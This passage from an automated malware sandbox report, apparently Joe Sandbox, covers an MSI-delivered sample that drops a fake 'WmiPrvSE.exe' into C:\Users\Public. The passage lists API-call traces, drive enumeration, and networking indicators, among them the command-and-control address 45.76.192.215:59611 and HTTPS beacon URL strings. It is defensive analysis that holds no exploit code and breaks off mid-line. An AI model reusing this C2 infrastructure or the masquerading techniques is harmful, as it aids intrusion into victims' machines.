                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1eSOBjseu2.msi, MSI44AA.tmp.2.dr, MSI40EF.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: Binary string: tomation.pdbk source: powershell.exe, 00000011.00000002.1530812316.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Desktop.exe, 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000000.1431460900.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000003.1434163995.000002EF11318000.00000004.00000020.00020000.00000000.sdmp, Desktop.exe, 00000005.00000003.1433314174.000002EF12A71000.00000004.00000020.00020000.00000000.sdmp, 1eSOBjseu2.msi, Desktop.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: Binary string: pdbpdblib.pdb=e\fo source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .textn.pdb ` source: powershell.exe, 0000000F.00000002.1581398989.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1eSOBjseu2.msi, MSI3FB2.tmp.2.dr, MSI4080.tmp.2.dr, MSI4020.tmp.2.dr, MSI40BF.tmp.2.dr, MSI4060.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0007A1F0 FindFirstFileW,CreateFileW,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,GetModuleFileNameW,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose,4_2_0007A1F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0007C450 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW,4_2_0007C450
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00084AF0 FindFirstFileW,GetLastError,FindClose,4_2_00084AF0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00091870 FindFirstFileW,FindClose,FindClose,4_2_00091870
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A60A0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_000A60A0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000E4329 FindFirstFileExW,4_2_000E4329
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A48F0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_000A48F0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A4CC0 FindFirstFileW,FindClose,4_2_000A4CC0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_0009CE70 FindFirstFileW,FindClose,4_2_0009CE70
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000619C0 FindFirstFileW,FindNextFileW,FindClose,4_2_000619C0
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00081D00 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,4_2_00081D00
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00085E00 FindFirstFileW,FindClose,4_2_00085E00
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB2440BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7BB2440BC
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB25B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7BB25B190
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB26FCA0 FindFirstFileExA,5_2_00007FF7BB26FCA0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00779220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,23_2_00779220
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00771C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,23_2_00771C30
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000A3790 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,4_2_000A3790
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 4x nop then sub rsp, 28h23_2_00402314

                Networking

                barindex
                Source: Malware configuration extractorURLs: 45.76.192.215
                Source: global trafficTCP traffic: 192.168.2.8:49709 -> 45.76.192.215:59611
                Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.192.215
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0076E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,23_2_0076E68C
                Source: WmiPrvSE.exe, 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
                Source: powershell.exe, 0000000B.00000002.1538195254.0000000007BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1516318919.0000000003628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000009.00000002.1569405040.0000000002736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                Source: powershell.exe, 00000009.00000002.1611147208.0000000006ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en8
                Source: powershell.exe, 00000009.00000002.1578339616.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1586466556.0000000007003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215/pq
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215/xq
                Source: WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611//F
                Source: WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/3X
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/5F.J
                Source: WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/9
                Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/92.215:59611/
                Source: WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/92.215:59611/sX(J
                Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/GFxJ(
                Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.76.192.215:59611/HF
                Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 